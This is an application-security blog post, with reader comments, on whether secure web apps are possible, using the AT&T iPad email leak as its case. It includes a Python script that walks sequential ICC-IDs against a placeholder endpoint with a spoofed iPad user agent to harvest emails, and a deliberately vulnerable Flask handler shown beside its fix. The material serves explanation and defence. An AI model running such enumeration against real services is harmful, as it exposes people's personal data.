We security folks are a tough crowd, and we have trouble understanding why stuff that is obvious to us isn’t so obvious to everyone else. We wonder why app developers can’t understand how to develop a secure application. Why can’t they grok SDL or run a damn scanner against the application before it goes live? QA? Ha. Obviously that’s for losers. And those sentiments aren’t totally misplaced. There is a tremendous amount of apathy regarding software security, and the incentives for developers to do it right just aren’t there.
But it’s not all the developers’ fault, because for the most part secure coding is a dream. Yeah, maybe that’s harsh and I’m sure the tool vendors will be hanging me in effigy soon enough, but that’s how it seems to me. Says the guy who hasn’t developed real code for 18+ years and leaves the application security research to folks (like Adrian) who are qualified to have an opinion. But not being qualified never stopped me from having an opinion before.
I come to this conclusion after spending some time trying to digest a post by Errata Security’s Rob Graham on the AT&T iPad hack. Rob goes through quite a few application security no-nos, quoting chapter and verse, pointing them out in this rather simple attack.
This specific attack vector doesn’t appear in the OWASP Top 10 list, nor should it. But it underscores the difficulty of really securing an application and the need to not just run a scanner against the code, but to really exercise the business logic before turning the app loose on the world.
Rob’s post talks about information leakage, security via obscurity, the blurring line between internal and external, and other ways to make an application do unintended things, usually ending in some kind of successful attack.
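To make that concrete, here is a rough sketch of the enumeration pattern at the heart of the attack. Everything in it is a placeholder of mine (the endpoint URL, the parameter name, the response handling), not the actual AT&T interface; the real script simply walked predictable ICC-IDs and collected whatever email address the server helpfully returned.

```python
import requests  # third-party HTTP library: pip install requests

# Placeholder endpoint: the real AT&T URL and parameter names are not
# reproduced here, so these values are illustrative only.
ENDPOINT = "https://example.com/ipad/login"
IPAD_UA = "Mozilla/5.0 (iPad)"  # the endpoint reportedly answered only iPad user agents

def probe(icc_id):
    """Ask the endpoint to pre-populate its login form for one ICC-ID.
    A response containing an email address means the ID was valid."""
    resp = requests.get(
        ENDPOINT,
        params={"ICCID": icc_id},        # illustrative parameter name
        headers={"User-Agent": IPAD_UA},
        timeout=10,
    )
    return resp.text if "@" in resp.text else None

# ICC-IDs are long but issued largely sequentially, so walking a range is
# trivial: no authentication, no rate limiting, no secret required.
base = 89014104212619460000  # made-up starting value
for offset in range(1000):
    hit = probe(str(base + offset))
    if hit:
        print("leaked:", hit[:80])
```

The script is trivial; the failure is the server-side assumption it violates, namely that nobody outside an iPad would ever ask.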
So does that mean we give up, which seemed to be one of the messages from the Gartner show this week (hat tip to Ed at Securitycurve)? Not so much, but we have to continue aggressively managing expectations. If you have smart guys like Rob, RSnake, or Jeremiah beat the crap out of your application, they will find problems. Then you’ll have an opportunity to fix them before the launch. In a perfect world, this is exactly what you would do, but it certainly isn’t the cheapest or fastest option.
On the other hand, you can run a scanner against the code and eliminate much of the lowest-hanging fruit that the script kiddies would target. That’s certainly an option, but the key to this approach is to make sure everyone knows a talented attacker specifically targeting your stuff will win. So when an attack not explicitly mentioned in your threat model (like the AT&T/iPad attack) happens, you will have to deal with it. And if you have some buddies in the FBI, maybe you can even get the hacker arrested on drug charges…
Or you could do nothing, like most of the world, and act surprised when a 12-year-old in Estonia sells your customer data on a grey-market website.
To think we can really develop secure web applications is probably a pipe dream – depending on our definition of ‘secure’, obviously. But we certainly can make our apps more secure and outrun our slower competitors, if not the bear. Most of the time that’s enough.
6 Replies to “Are Secure Web Apps Possible?”
@ 401k – Front tire blew, rim hit expansion joint, car became Frisbee. I was an unwilling 360-degree observer. Sure, I was a participant, but one without any semblance of input or control.
-Adrian
Lol. Jeremiah Grossman doesn’t do pen-testing!
There are many ways to prevent security bugs just like regular bugs. Most orgs today spend too much time doing nothing — or the bare minimum.
If you want rigorous protection or assurance then build some rigor into your development around appsec!
@Adrian: Your CAR flipped off the road. You didn’t FLIP the car, it just flipped on its own? Must have been like “a car hit a tree, injuring driver and occupants” sort of thing. The driver didn’t do it, the car did.
Adrian hits on a key point. Another is that failing to make reasonable efforts to minimize foreseeable weaknesses is negligent behavior, which can (and increasingly does) put the organization in legal jeopardy. Doing nothing is not legally defensible unless a documented decision process shows a full and valid analysis of that decision.
As for OWASP Top 10, you’re wrong that it doesn’t cover the AT&T break. It definitely falls under “A3: Broken Authentication and Session Management” and could also be construed to touch on “A4: Insecure Direct Object References” and “A6: Security Misconfiguration” and “A8: Failure to Restrict URL Access” (since I believe they said the URL wasn’t supposed to be exposed external to the mobile network). If you want to go even more in-depth, add in the CWE/SANS Top 25 just for kicks.
Good point. Bad example.
The fact is that the hack is *EXACTLY* A4 in the OWASP Top 10. So it really ought to be in everyone’s threat model. But it’s not easy to scan for, so it’s often overlooked.
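To see why scanners whiff on it, here is a minimal A4 sketch. Flask, the route names, and the data are mine for illustration, not anything from the actual AT&T code; the vulnerable handler is syntactically spotless, and the flaw only shows up once you know the identifier was never supposed to come from the client.

```python
from flask import Flask, abort, jsonify, request, session

app = Flask(__name__)
app.secret_key = "dev-only"  # needed for session support in this sketch

# Invented data standing in for a carrier's subscriber database.
EMAILS = {"89014104212619460001": "victim@example.com"}

@app.route("/email")
def email_vulnerable():
    # A4 in miniature: the handler dereferences whatever identifier the
    # client supplies. Nothing here looks broken to a scanner, because the
    # bug is a missing authorization decision, not a coding error.
    icc_id = request.args.get("ICCID", "")
    if icc_id not in EMAILS:
        abort(404)
    return jsonify(email=EMAILS[icc_id])

@app.route("/email-fixed")
def email_fixed():
    # The fix: derive the identifier from the authenticated session rather
    # than trusting the request, so a user can only see their own record.
    icc_id = session.get("iccid")
    if icc_id is None or icc_id not in EMAILS:
        abort(403)
    return jsonify(email=EMAILS[icc_id])
```

That is why exercising the business logic matters: only a tester who asks “whose ICC-ID is this supposed to be?” finds it.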
I think it’s different from what you describe. As an example, when my car flipped off the road last year, it happened in a way I could not imagine was even possible. I had trained and prepared for emergencies, but when it happened it was totally different from anything I could even conceive.